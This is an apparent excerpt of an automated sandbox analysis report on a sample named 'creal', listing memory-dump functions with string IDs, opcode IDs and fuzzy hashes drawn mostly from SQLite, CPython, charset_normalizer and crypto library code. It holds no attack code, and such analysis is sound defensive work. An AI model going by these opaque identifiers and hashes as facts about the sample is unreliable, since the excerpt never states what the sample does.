                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                                                                                                • API String ID: 2221118986-463513059
                                                                                                                                                                                                                • Opcode ID: 44512094730ef02586f7467600008db8530935ff935724490f288e676ea215e3
                                                                                                                                                                                                                • Instruction ID: 85512b9ff12eeeca5115881e97ba3f5f3a96febac5b1c7731cb062eca538a1b2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44512094730ef02586f7467600008db8530935ff935724490f288e676ea215e3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FBE15A55B2C7DA47EE1C8BB928153782B90AB4A7C0F58513ADEAE477D2DE3CB512C301
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID: Bad ptr map entry key=%u expected=(%u,%u) got=(%u,%u)$Failed to read ptrmap key=%u$Freelist: $Page %u: never used$Page %u: pointer map referenced$incremental_vacuum enabled with a max rootpage of zero$max rootpage (%u) disagrees with header (%u)
                                                                                                                                                                                                                • API String ID: 2221118986-741541785
                                                                                                                                                                                                                • Opcode ID: 47e708a9b2cd1ce954ac55090724bb7a2ab165dfa4cac61b29933a9d17c3da3a
                                                                                                                                                                                                                • Instruction ID: 4f9750a37c8561d28fab21a5333b2dc261e2d2d1bc58f812cf1e1ab2dca42d9a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47e708a9b2cd1ce954ac55090724bb7a2ab165dfa4cac61b29933a9d17c3da3a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A102AC72F286628AEB10CBA5E4607AD77A9FB84784F14413ADA4E47B94DF7CE440CB11
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: -x0$0123456789ABCDEF0123456789abcdef$VUUU$VUUU
                                                                                                                                                                                                                • API String ID: 0-2031831958
                                                                                                                                                                                                                • Opcode ID: fb54a0c179caa17773880983dc6a8eccc5c567f5f9aeb018be3315aa168a96dc
                                                                                                                                                                                                                • Instruction ID: f3912fc38ce2eb4ca3d15b801ee6f314ff9823066087e5dce8145b1723923bc7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb54a0c179caa17773880983dc6a8eccc5c567f5f9aeb018be3315aa168a96dc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8FF11F66B2C7AA85EB64CB689054B7E7FA4EB85BC4F084035DA8E43795EE3CE401C701
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 438689982-0
                                                                                                                                                                                                                • Opcode ID: 34e0163e64a6ab47a454ebcfa3fdf24bc47e619a7ea06a7069ab159aea8323a2
                                                                                                                                                                                                                • Instruction ID: ea5d483db5ed8b1762e72c6f2467805de9a491388c93ab4d77ff2ddc71df9d96
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34e0163e64a6ab47a454ebcfa3fdf24bc47e619a7ea06a7069ab159aea8323a2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2FE1D43272C79186E7909F69D0407AD7BA9FB58BC4F048036EE8E47B85DE3DD4458312
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_Format$DeallocDict_$ContainsItemSequence_Tuple_Unicode_
                                                                                                                                                                                                                • String ID: %.200s%s missing required argument '%U' (pos %d)$%.200s%s missing required keyword-only argument '%U'$%.200s%s takes %s %d positional argument%s (%zd given)$%.200s%s takes at most %d %sargument%s (%zd given)$%.200s%s takes no positional arguments$'%S' is an invalid keyword argument for %.200s%s$argument for %.200s%s given by name ('%U') and position (%d)$at least$at most$exactly$function$keyword $this function
                                                                                                                                                                                                                • API String ID: 3590232122-3030676885
                                                                                                                                                                                                                • Opcode ID: 1ff9da88f9a7a57dac390b6711fe79e0e012da9bfee1266b6d806b6e39d40ce2
                                                                                                                                                                                                                • Instruction ID: 6af4367dad05dbe3b1ae7af44cea931b4bd30896c0ad2916973bc0f4b1fff302
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ff9da88f9a7a57dac390b6711fe79e0e012da9bfee1266b6d806b6e39d40ce2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD125D32A09B86C1EA548F85E8807BD77A5FB84BD4F444136EA6E43764EF3CE485D702
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$Object_Vectorcall$Err_Method$ChainCode_EmptyExceptions1FetchFrame_FromLong_Number_Ssize_tState_Thread
                                                                                                                                                                                                                • String ID: bool$feed$str
                                                                                                                                                                                                                • API String ID: 476165880-2613659865
                                                                                                                                                                                                                • Opcode ID: 7f2e8c55a4eeca045cf774529f01804e1fee1cd08f798284cff5715901533d5d
                                                                                                                                                                                                                • Instruction ID: f497a20b6539afa6cf2cdacb5534be53ebf914dd7533273b982825dcef1f53fa
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f2e8c55a4eeca045cf774529f01804e1fee1cd08f798284cff5715901533d5d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D023931A09B83C1EB689F92E8553BD23A2AF45BD4F484031D96D87AA5EF3CE444D743
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$Object_$Vectorcall$CompareContainsErr_FormatFromLong_MethodNumber_RichSet_Ssize_tSubtypeType_
                                                                                                                                                                                                                • String ID: bool$feed$set
                                                                                                                                                                                                                • API String ID: 588643045-561237756
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: strchr
                                                                                                                                                                                                                • String ID: %$Empty keyword parameter name$Empty parameter name after $$Invalid format string ($ before |)$Invalid format string ($ specified twice)$Invalid format string (@ specified twice)$Invalid format string (@ without preceding | and $)$Invalid format string (| specified twice)$More keyword list entries (%d) than format specifiers (%d)$more argument specifiers than keyword list entries (remaining format:'%s')
                                                                                                                                                                                                                • API String ID: 2830005266-262724644
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FF8E68FC340: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000,00007FF8E696738A,?,?,?,?,?,00007FF8E68FC0E2), ref: 00007FF8E68FC4E8
                                                                                                                                                                                                                  • Part of subcall function 00007FF8E68FBE30: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00007FF8E68F653C), ref: 00007FF8E68FBF9A
                                                                                                                                                                                                                  • Part of subcall function 00007FF8E68FBE30: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00007FF8E68F653C), ref: 00007FF8E68FC026
                                                                                                                                                                                                                • memcpy.VCRUNTIME140 ref: 00007FF8E6961A74
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: FILTER clause may only be used with aggregate window functions$L$RANGE with offset PRECEDING/FOLLOWING requires one ORDER BY expression$U$U$Y$Z$Z$cume_dist$dense_rank$lag$lead$ntile$percent_rank$rank$row_number
                                                                                                                                                                                                                • API String ID: 3510742995-2880407920
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$List_$Object_$AppendAttrCallErr_FastLookupSliceStringTuple
                                                                                                                                                                                                                • String ID: __mro_entries__ must return a tuple
                                                                                                                                                                                                                • API String ID: 1865160900-2385075324
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$Err_$AttrDict_Object_String$ClearExceptionItemMatches
                                                                                                                                                                                                                • String ID: __mypyc_attrs__$__mypyc_attrs__ is not a tuple
                                                                                                                                                                                                                • API String ID: 2346549887-4201147154
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1577634657.00007FF8E6FC1000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FF8E6FC0000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e6fc0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _aligned_free$_aligned_malloc_wassertcallocfree
                                                                                                                                                                                                                • String ID: block_len < 256$block_len > 0$src/raw_ctr.c$src/raw_ctr.c
                                                                                                                                                                                                                • API String ID: 592997318-2016502466
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AttrCapsule_DeallocObject_String$Create2Module_
                                                                                                                                                                                                                • String ID: charset_normalizer.md__mypyc.exports$charset_normalizer.md__mypyc.init_charset_normalizer___md$exports$init_charset_normalizer___md
                                                                                                                                                                                                                • API String ID: 2519120496-2411258805
                                                                                                                                                                                                                • Opcode ID: 6cb80ad11c98d76827863cb71e74507b593be2b67b62d800d4c12a6864baf513
                                                                                                                                                                                                                • Instruction ID: e17e7bf3271163b900cefd7545e88a5e09a8db6db65f97c0ca8936f5bba111dd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6cb80ad11c98d76827863cb71e74507b593be2b67b62d800d4c12a6864baf513
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D31C571E1DB8382EB5E8B95E89477D23A1AF45BD8F485034C92D477A4EE3CE484D702
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocErr_$Back_ChainCode_EmptyExceptions1FetchFrame_HereRestoreState_ThreadTrace
                                                                                                                                                                                                                • String ID: charset_normalizer\md.py
                                                                                                                                                                                                                • API String ID: 1599779757-1392889821
                                                                                                                                                                                                                • Opcode ID: 929c761034df64e23572057a73fe2c5fab85c31af172243b9a7b6395f97a8051
                                                                                                                                                                                                                • Instruction ID: 284577ce898234f8246775bf867ad1e74b06aaa407287b3ec6dbece14f6002a9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 929c761034df64e23572057a73fe2c5fab85c31af172243b9a7b6395f97a8051
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6212C36A08B82C1EB148B91E84436DA7B1FB89BD5F440031DA6E53B64EF3CE544C702
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$Object_State_ThreadTrackTrash_beginTrash_condTrash_endUnchecked
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2819143443-0
                                                                                                                                                                                                                • Opcode ID: 34ec5bebfffadac6be9bf9876dce8c975bd5e57f5d382802bd6aac2d38012139
                                                                                                                                                                                                                • Instruction ID: 0814a9b5817e47cd53f8c47c5bfb353bc9f1f57dda866ac68954c06fcc4c933e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34ec5bebfffadac6be9bf9876dce8c975bd5e57f5d382802bd6aac2d38012139
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6251B432908742C1EB598FA4D86837C22F1AB44BFDF144334DA7A522D8EF7EE4858342
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
                                                                                                                                                                                                                • API String ID: 0-3733955532
                                                                                                                                                                                                                • Opcode ID: e8e5a8eb5bbe4c9cdfe345609da715942a7d6ed5573c78f20b4feb771ef1efc9
                                                                                                                                                                                                                • Instruction ID: 125a438efc341117b903f025bd320b60b65acfe181b1de6ca42b66c54ba483f8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8e5a8eb5bbe4c9cdfe345609da715942a7d6ed5573c78f20b4feb771ef1efc9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C02A165F29A8281EA54AF91F498379A3E8FF55BC8F084135DE5E063A9DF3CE454C302
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1577473923.00007FF8E6FB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF8E6FB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577410915.00007FF8E6FB0000.00000002.00000001.01000000.00000021.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577517217.00007FF8E6FB2000.00000002.00000001.01000000.00000021.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577555444.00007FF8E6FB4000.00000002.00000001.01000000.00000021.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e6fb0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 349153199-0
                                                                                                                                                                                                                • Opcode ID: b83bcfdbda2627b91fecea52bb080c46b8b041ebfc422aeaa466320814e2d747
                                                                                                                                                                                                                • Instruction ID: f7fc004afdee1ac81ce3625b8874906a7de450e832f43981b7a38d7da37b32e3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b83bcfdbda2627b91fecea52bb080c46b8b041ebfc422aeaa466320814e2d747
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C818D61E3C24F86FA50EBE6A8493F97295AF967C0F5C4135DA0C83796DE3DE4068702
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1575627628.00007FF8E6F31000.00000020.00000001.01000000.00000029.sdmp, Offset: 00007FF8E6F30000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1575586394.00007FF8E6F30000.00000002.00000001.01000000.00000029.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1575707674.00007FF8E6F33000.00000002.00000001.01000000.00000029.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1575751750.00007FF8E6F35000.00000002.00000001.01000000.00000029.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e6f30000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 349153199-0
                                                                                                                                                                                                                • Opcode ID: b665e2aa0a1aafc407c8626279c8168d645185ea6c4bd927f3a78105dbac7c58
                                                                                                                                                                                                                • Instruction ID: 79bfb16e75fc15732000c11a67e2c1269e460b3087aec59201e55e7314ebc321
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b665e2aa0a1aafc407c8626279c8168d645185ea6c4bd927f3a78105dbac7c58
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21817A71EAC24FC6FA50EBE6A5493F97290AF96BC0F444435D90C87796DE2CE8468702
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1577634657.00007FF8E6FC1000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FF8E6FC0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577585028.00007FF8E6FC0000.00000002.00000001.01000000.00000020.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577691044.00007FF8E6FC3000.00000002.00000001.01000000.00000020.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577732223.00007FF8E6FC4000.00000004.00000001.01000000.00000020.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577775069.00007FF8E6FC5000.00000002.00000001.01000000.00000020.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e6fc0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 349153199-0
                                                                                                                                                                                                                • Opcode ID: 36ee1f5b3c6c56bb94e458d277562ecc12df9e8aa7007938e90fb84e13c3be66
                                                                                                                                                                                                                • Instruction ID: d2bfa938ea9d487713798708ca835cb780e9ee50f7d8cfc6918852af4dbb7d6b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36ee1f5b3c6c56bb94e458d277562ecc12df9e8aa7007938e90fb84e13c3be66
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5581B161E3C64FAAFB50EBE994493F932A0AF967C0F444135D90D43796DE3CE426870A
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1575166000.00007FF8E6F11000.00000020.00000001.01000000.0000002B.sdmp, Offset: 00007FF8E6F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1575122286.00007FF8E6F10000.00000002.00000001.01000000.0000002B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1575218759.00007FF8E6F16000.00000002.00000001.01000000.0000002B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1575264792.00007FF8E6F1B000.00000002.00000001.01000000.0000002B.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e6f10000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 349153199-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$FromLong_Ssize_t$Err_ItemObject_Slice_String
                                                                                                                                                                                                                • String ID: interpreted classes cannot inherit from compiled
                                                                                                                                                                                                                • API String ID: 575668516-2110327174
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
